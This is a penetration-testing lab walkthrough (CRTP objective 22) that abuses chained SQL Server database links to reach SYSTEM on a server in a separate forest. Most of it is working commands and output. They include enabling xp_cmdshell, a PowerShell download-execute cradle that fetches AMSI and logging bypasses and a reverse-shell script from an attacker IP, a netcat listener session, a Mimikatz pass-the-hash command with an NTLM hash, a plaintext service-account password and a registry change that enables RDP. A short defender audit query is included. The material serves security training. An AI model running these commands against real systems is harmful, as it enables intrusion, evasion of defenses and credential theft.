crtp-22

Learning Objective 22

Tasks

1 – Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Flag 37 [dcorp-mssql] – First SQL Server linked to dcorp-mssql 🚩

Flag 38 [dcorp-mssql] – Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

Flag 39 [dcorp-mssql] – SQL Server privileges on eu-sql 🚩

Flag 40 [dcorp-mssql] – Privileges on operating system of eu-sql 🚩


Enable xp_cmdshell with sp_configure [ already enabled in the lab ]

The following code will enable xp_cmdshell using sp_configure. You need to issue the RECONFIGURE command after each of these settings for it to take effect.

-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE



Solutions

1 – Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Let’s start by enumerating the SQL servers in the domain and checking whether studentx has privileges to connect to any of them. We can use the PowerUpSQL module for that. Run the commands below from a PowerShell session started using Invisi-Shell:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
PS C:\Users\student98> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
WARNING: The names of some imported commands from the module 'PowerupSQL' include unapproved verbs that might make them
 less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose
parameter. For a list of approved verbs, type Get-Verb.
PS C:\Users\student98> Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 6 instances were found.


ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon        : 4/1/2025 8:43 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon        : 4/1/2025 8:43 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon        : 12/3/2025 6:21 AM
Description      :

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon        : 12/3/2025 6:21 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon        : 12/3/2025 6:20 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon        : 12/3/2025 6:20 AM
Description      :


Find out to which SQL servers we can connect:

PS C:\Users\student98> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: DCORP-STD98 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName                           Instance                                    Status
------------                           --------                                    ------
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local      Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local       Not Accessible
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local,1433  Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local,1433  Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local       Not Accessible
DCORP-STD98                            DCORP-STD98                                 Not Accessible


PS C:\Users\student98>

So, we can connect to dcorp-mssql. Using the HeidiSQL client, let’s log in to dcorp-mssql using the Windows authentication of studentx. After login, enumerate linked databases on dcorp-mssql:

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
PS C:\Users\student98> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.


ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1916
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student98
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1916
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student98
IsSysadmin             : No
ActiveSessions         : 1


PS C:\Users\student98> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.


ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 0
DatabaseLinkName       : DCORP-MSSQL
DatabaseLinkLocation   : Local
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : True
is_data_access_enabled : False
modify_date            : 11/14/2022 4:46:10 AM

ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 1
DatabaseLinkName       : DCORP-SQL1
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : False
is_data_access_enabled : True
modify_date            : 12/4/2022 5:16:19 AM


PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL
VERBOSE:  - Link Login: dcorp\student98
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE:  - Link Login: dblinkuser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE:  - Link Login: sqluser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: EU-SQL7.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: EU-SQL7
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL7.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student98
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL7.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL7
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User        : sa
Links       :


So, there is a database link to dcorp-sql1 from dcorp-mssql. Let’s enumerate further links from dcorp-sql1. This can be done with the help of openquery:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"

If xp_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command:

PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'cmd /c set username'"


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student98
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL7.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL7
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Sweet! We have sysadmin on eu-sql server!
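As an added defender-side check (not part of the lab material), the T-SQL below reports, on one instance, the conditions this chain depends on: whether xp_cmdshell is enabled, which linked servers allow RPC out or data access, and which local logins are mapped to which remote account. Run it as sysadmin on each instance; the server name in the remediation comments is the lab's DCORP-SQL1 and is a placeholder.

```sql
-- Added audit query (not from the lab). Run on each SQL Server instance as sysadmin.

-- 1. xp_cmdshell state: value_in_use = 1 means enabled (the lab has it pre-enabled).
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Linked servers and their login mappings.
--    local_principal_id = 0 is the wildcard row that applies to every local login;
--    a fixed remote_name on that row (e.g. 'sa') means any caller on this instance
--    reaches the remote server as that account. That is the pattern behind a
--    link login of 'sa' with IsSysAdmin = 1 such as the crawl above reports for EU-SQL7.
SELECT s.name                     AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,        -- 1: remote procedure calls (EXEC ... AT <server>) are allowed
       s.is_data_access_enabled,    -- 1: openquery() against this link works
       CASE ll.local_principal_id
            WHEN 0 THEN '<all local logins>'
            ELSE SUSER_NAME(ll.local_principal_id)
       END                          AS local_login,
       ll.uses_self_credential,     -- 1: the caller's own Windows identity is forwarded instead
       ll.remote_name,
       s.modify_date
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- 3. Remediation for findings such as an enabled xp_cmdshell or a catch-all
--    high-privilege mapping (server name is the lab's; substitute your own):
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_serveroption @server = N'DCORP-SQL1', @optname = N'rpc out', @optvalue = N'false';
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'DCORP-SQL1', @locallogin = NULL;  -- drops the wildcard mapping
```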

The crawl that Get-SQLServerLinkCrawl performs automatically corresponds to the following nested openquery calls (each hop adds one level of quote doubling):

select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')

Create Invoke-PowerShellTcpEx.ps1:
  • Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.

  • Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).

  • Add “Power -Reverse -IPAddress 172.16.100.X -Port 443” (without quotes) to the end of the file.

Let’s use a PowerShell download-execute cradle to run a PowerShell reverse shell on the eu-sql instance. First, host the required files on HFS, and remember to edit Invoke-PowerShellTcpEx.ps1, changing the IP and port.

After that start a listener in a new shell: C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.67/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql45
PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.98/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.98/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.98/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql7


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student98
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL7.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL7
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User        : sa
Links       :


On the listener:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
$env:username
$env:computername
C:\Users\student98>c:\ad\Tools\netcat-win32-1.12\nc64.exe -lvp 443
listening on [any] 443 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.98] from (UNKNOWN) [172.16.15.17] 55720: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL7
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql7
PS C:\Windows\system32>ls env:


If there were only one SQL server on which we are sysadmin, the query would be as follows. Note that the closing double quote must come before -Instance; in the run below, the parameter ended up inside the command string, so the cmdlet fell back to the local machine (DCORP-STD98):

Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.Webclient).Down....." -Instance DCORP-MSSQL

PS C:\Users\student98> Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.Webclient).DownloadString('http://172.16.100.89/Invoke-PowerShellTcp.ps1' -Instance DCORP-MSSQL"
VERBOSE: Creating runspace pool and session states
VERBOSE: DCORP-STD98 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName Instance    CommandResults
------------ --------    --------------
DCORP-STD98  DCORP-STD98 Not Accessible

Note: dcorp-mssql is a server without a GUI.

C:\Users\student98>runas /user:svcadmin@dollarcorp.moneycorp.local /netonly cmd
Enter the password for svcadmin@dollarcorp.moneycorp.local:
Attempting to start cmd as user "svcadmin@dollarcorp.moneycorp.local" ...
 *ThisisBlasphemyThisisMadness!!

C:\Windows\system32>winrs -r:dcorp-mssql cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>hostname
hostname
dcorp-mssql

C:\Users\svcadmin>powershell -c "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 -ErrorAction Stop"

Note: HeidiSQL can be used to connect to dcorp-mssql.


Invoke-Mimi -Command '"sekurlsa::pth /user:sqladmin /domain:dcorp /ntlm:07e8be316e3da9a042a9cb681df19bf5 /run:cmd.exe"'

PS C:\AD\Tools> . .\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"sekurlsa::pth /user:sqladmin /domain:dcorp /ntlm:07e8be316e3da9a042a9cb681df19bf5 /run:cmd.exe"'


Flag 37 [dcorp-mssql] – First SQL Server linked to dcorp-mssql 🚩

The first SQL Server linked to dcorp-mssql is DCORP-SQL1.

Links on this server: DCORP-SQL1

Flag 38 [dcorp-mssql] – Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

sqluser is the name of the SQL Server user used to establish the link between dcorp-sql1 and dcorp-mgmt.

Server: DCORP-MGMT
- Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
- Link Login: sqluser

Flag 39 [dcorp-mssql] – SQL Server privileges on eu-sql 🚩

The SQL Server privilege on eu-sql is sysadmin.

Server: EU-SQLX
- Link IsSysAdmin: 1

Flag 40 [dcorp-mssql] – Privileges on operating system of eu-sql 🚩

The operating-system privileges on eu-sql are those of SYSTEM (nt authority\system), since xp_cmdshell runs under the SQL Server service account:

PS C:\Windows\system32>$env:username
system